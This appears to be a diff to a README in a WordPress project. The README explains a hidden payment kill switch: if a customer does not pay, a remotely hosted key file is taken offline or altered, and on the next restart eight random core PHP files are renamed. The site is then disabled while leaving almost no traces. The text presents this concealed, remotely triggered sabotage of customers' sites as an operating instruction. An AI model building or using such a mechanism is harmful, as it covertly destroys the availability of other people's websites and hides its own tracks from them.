mr1337alien/wordpress/README.md

 # When Completely Paid:

+Copy the files
+- `src/enigma.key`
+- `src/enigma.secret`
-Copy the files `src/enigma.key` and `src/enigma.secret` into the same directory on the server
+into the same directory on the server

 When Problems With Payment: Take the file `https://impact-z.one/pay-your-bills/<CUSTOMER_ABBR>/enigma.key` offline or change it' content - The next time WordPress gets restarted random core php files are renamed (8 by the number), even without one of those WordPress cannot be started anymore, there are almost no traces to find